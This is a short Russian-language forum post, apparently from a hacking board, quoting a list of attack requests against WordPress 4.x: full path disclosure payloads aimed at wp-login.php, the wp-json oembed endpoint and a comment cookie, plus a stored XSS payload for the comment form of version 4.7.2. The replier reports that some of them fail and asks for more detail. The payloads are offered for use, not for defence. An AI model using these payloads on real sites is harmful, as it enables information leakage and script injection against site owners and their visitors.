12.03.2017, 00:12
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
Сообщение от st55
st55 said:
↑
Wordpress 4.*.*
Full Path Disclosure
wordpress/wp-login.php
Код:
Code:
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json
Код:
Code:
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Код:
Code:
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860504[]
Wordpress 4.7.2
Stored XSS
Привилегии: Редактор+
/wp/wp-comments-post.php
Код:
Code:
POST: comment=">alert('XSS');
 раскрытие путей работает только через wp-login.php и то редко, wp-json вообще не работает, можно подробней?
|
|
|